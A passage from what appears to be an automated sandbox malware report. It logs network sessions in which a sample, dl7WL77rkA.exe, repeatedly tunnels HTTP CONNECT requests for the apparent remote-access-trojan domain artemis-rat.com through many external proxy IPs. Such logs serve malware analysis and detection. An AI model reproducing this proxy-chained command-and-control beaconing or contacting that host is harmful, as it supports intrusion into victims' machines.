                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1827192.168.2.555121172.67.181.129803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.176419020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.331001043 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1828192.168.2.55503846.35.9.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.181704998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1829192.168.2.551022162.214.170.144317013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.183228970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207674026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.389549017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405194998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1830192.168.2.555020185.53.129.14131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.189877987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.933404922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905179977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.811383963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.514447927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.217194080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.905091047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1831192.168.2.5550378.217.143.187156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.205178976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1832192.168.2.554259213.136.75.85590583876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.208097935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207674980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1833192.168.2.555030221.231.13.19810803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.224260092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1834192.168.2.55090651.222.241.157300113876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.232343912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1835192.168.2.555032208.109.14.49114263876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.235541105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1836192.168.2.554379192.99.207.129130033876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.235948086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.404937029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1837192.168.2.55507875.119.145.15475053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.285281897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.092689037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092864037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.905265093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.592618942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.201941967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.904973030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1838192.168.2.554979109.194.22.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.285672903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1839192.168.2.55507546.101.179.4931293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.286345959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083182096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014666080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014609098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.717869043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.343377113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.014370918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1840192.168.2.55434451.222.241.157363633876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.290095091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405093908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.508866072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.514646053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1841192.168.2.554380189.240.60.16490903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.292401075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.569437981 CET72INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1842192.168.2.553486135.148.10.161515073876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.314431906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.933489084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.681910992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1843192.168.2.553407138.2.73.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.321873903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1844192.168.2.553385148.72.206.84148153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.330847025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1845192.168.2.555108195.248.243.14972373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.331408978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083230972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1846192.168.2.555086101.133.175.25131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
